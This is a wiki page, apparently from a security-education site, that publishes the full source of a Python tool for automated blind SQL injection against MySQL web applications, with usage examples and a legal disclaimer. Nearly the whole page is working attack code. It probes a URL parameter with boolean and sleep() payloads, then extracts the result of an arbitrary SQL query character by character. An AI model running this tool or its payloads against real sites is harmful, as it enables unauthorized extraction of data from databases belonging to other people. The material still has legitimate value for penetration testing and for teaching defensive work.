
SQL injection/mysqli-blindutils/sqli-slee.py

From NetSec
Revision as of 17:00, 22 September 2012 by MinnaMichalik (Talk | contribs)

This script uses time-based and boolean-based blind SQL injection to obtain the desired information from a MySQL database.

Info

The syntax of this script is:

 python bsqli.py -u [url] -i [injection]

Example

 python bsqli.py -u "http://target.com/?id=1%27" -i "select database()"

Disclaimer

The end-user is liable for his or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act.

Source

 
#!/usr/bin/python
 
import sys,re,urllib,urllib2,string,time
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
 
def request(URL):
    """Send a GET to URL and return the length in bytes of the response body.

    The body length is the only thing callers look at: vulncheck() and
    iswhat() use a difference in length as the true/false oracle in the
    boolean-based mode, and in the time-based mode only the wall time spent
    around this call matters.

    On an HTTP error status or a connection failure the reason is printed
    and the whole script exits with status 1; there is no retry and no
    return value for the caller to inspect in that case.
    """
    # A single hard-coded User-Agent is reused for every probe, so the whole
    # probe sequence appears under one identical UA in the server's request
    # log, next to the '--+' suffix every caller appends to the query string.
    useragent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
    req = urllib2.Request(URL, None, useragent)
    try:
        # The local 'request' shadows this function's own name; harmless
        # because nothing here recurses.
        request=urllib2.urlopen(req)
    except HTTPError,  e:
        print('[!] The server couldnt fulfill the request.')
        print('[!] Error code: '+str(e.code))
        sys.exit(1)
    except URLError,  e:
        print('[!] We failed to reach a server.')
        print('[!] Reason: '+str(e.reason))
        sys.exit(1)
    return len(request.read())
 
def value(URL):
    """Recover one character of the injected query's result via iswhat().

    URL already ends in an expression whose value is the ASCII code of the
    character being recovered (built in main()); iswhat() appends the
    comparison operator and the guess. The range 0..255 is bisected with at
    most 9 probes of '>' / '<' / '='. Returns chr(guess) as soon as an '='
    probe answers true, otherwise the string 'done' once the 9-probe budget
    is used up; main() treats 'done' as its end-of-data signal.
    """
    target=0        # never read
    end=0           # probe counter; the loop stops when it reaches 9
    nextmaybe=0
    floor=0
    ceiling=255
    # First guess is 127 (integer division; this file's 'except X, e' syntax
    # is Python 2, where int/int truncates).
    maybe = int(ceiling)/2
    while(end!=9):
        if iswhat(URL, maybe, '>'):
            floor = maybe
            nextmaybe = int(maybe + ((ceiling - floor)/2))
        elif iswhat(URL, maybe, '<'):
            ceiling = maybe
            nextmaybe = int(maybe - ((ceiling - floor)/2))
        elif iswhat(URL, maybe, '='):
            return chr(maybe)
        # If none of the three probes answered true (an inconclusive oracle,
        # e.g. a timing probe under latency), nextmaybe keeps its previous
        # value and the same guess is simply probed again until the budget
        # runs out.
        maybe = nextmaybe
        end+=1
    return 'done'
 
 
def iswhat(URL,maybe,op):
    """Ask the blind-SQLi oracle whether the target value is <op> `maybe`.

    Reads the module global `sqlitype`, which main() sets from vulncheck():

    - 'boolean': sends URL + op + maybe + '--+' and compares the response
      length with the global `TrueResponse` recorded by vulncheck(); an
      equal length is taken as "true".
    - 'time': sends URL + op + maybe + ')*2)--+' (closing the
      'sleep((select ...' expression that main() leaves open) and takes a
      round trip longer than 2 seconds as "true".

    Returns 1 for true and 0 for false. No other sqlitype is handled, so
    anything else falls through and returns None (falsy for value()).
    """
    if(sqlitype=='boolean'):
        # Length oracle: same body length as the known-true probe => true.
        ValueResponse=int(request(str(URL)+str(op)+str(maybe)+'--+'))
        if(TrueResponse==ValueResponse):
            return 1
        else:
            return 0
    elif(sqlitype=='time'):
        start = time.time()
        # Timing oracle: the response length is discarded (the misspelled
        # local 'ValueResonse' is never read).
        ValueResonse=request(str(URL)+str(op)+str(maybe)+')*2)--+')
        elapsedtime = (time.time() - start)
        # The whole round trip is measured, so network latency counts toward
        # the 2 s threshold and a slow link can yield false "true" answers.
        if (elapsedtime > 2):
            return 1
        else:
            return 0
 
def vulncheck(URL):
    """Probe URL for a blind-SQLi oracle and return 'boolean' or 'time'.

    Two requests are sent with a tautology (43 like 43) and a contradiction
    (34 like 43) appended. If their response lengths differ, the tautology's
    length is stored in the module global `TrueResponse` (read later by
    iswhat()) and 'boolean' is returned. Otherwise one sleep(5) probe is
    timed and 'time' is returned when the round trip exceeds 5 seconds.
    If neither test fires, a message is printed and the script exits with
    status 1 instead of returning.

    Note that any page whose length varies between two requests for
    unrelated reasons (dynamic content, timestamps) also passes the first
    test, so 'boolean' here only means "the two lengths differed".
    """
    print('[+] Checking site...')
    global TrueResponse
    TrueResponse=int(request(URL+'%20AND%2043%20like%2043--+'))
    FalseResponse=int(request(URL+'%20AND%2034%20like%2043--+'))
    if(TrueResponse!=FalseResponse):
        print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
        return 'boolean'
    else:
        start = time.time()
        # Only wall time is inspected here; the response body is ignored.
        SleepResponse=request(URL+'%20and%20sleep(5)--+')
        elapsedtime = (time.time() - start)
        if (elapsedtime > 5):
            print('[+] Site seems to be vulnerable to time based blind SQL injection.')
            return 'time'
        else:
            print('[!] Seems like site isnt vulnerable to blind SQL injection.')
            sys.exit(1)
 
def main():
    """Entry point: parse -u/-i, pick an oracle type, dump the query result.

    The -i text is percent-encoded with urllib2.quote() and wrapped in an
    ascii(substr((...) from N for 1)) expression, one character position N
    at a time, until value() returns 'done'. The module global `sqlitype`
    is set here from vulncheck() and read by iswhat().

    All input comes from the command line; the function exits with status 1
    when either option is missing.
    """
    print('''
	Auto BSQLi tool for MySQL
	      ''')

    usage = 'usage: %prog -u <target> -i <injection>'
    parser = OptionParser(usage=usage)
    parser.add_option("-u", action="store", type="string", dest="URL",
    help='"http://site.tld/index.php?id=1%27"')
    parser.add_option('-i', action='store', type='string', dest='INJECTION',
    help='"select version()"')

    (options, args) = parser.parse_args()
    if options.URL and options.INJECTION:
        # Only -i is percent-encoded; -u is sent exactly as given (the help
        # text shows it already encoded, e.g. id=1%27).
        URL=options.URL
        INJECTION=urllib2.quote(options.INJECTION.encode("utf8"))
    else:
        print('[!] Missing url or injection parameter.')
        print('[!] Use --help.')
        sys.exit(1)

    global sqlitype
    sqlitype=vulncheck(URL)
    position=1
    dump=''
    print('[+] Dumping data...')
    # One value() call per character position; 'done' ends the loop.
    while(1):
        if(sqlitype=='boolean'):
            letter=value(URL+'%20and%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))')
        elif(sqlitype=='time'):
            # Leaves 'sleep((select ...' open; iswhat() appends ')*2)--+'.
            letter=value(URL+'%20and%20sleep((select%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))')
        if(letter=='done'):
            break
        dump=dump+letter
        position+=1
    if(dump):
        print('[+] Data: '+dump)
    else:
        print('[!] No data dumped. Check your injection.')
 
# Run main() only when executed as a script, not when imported.
if __name__ == "__main__":
    main()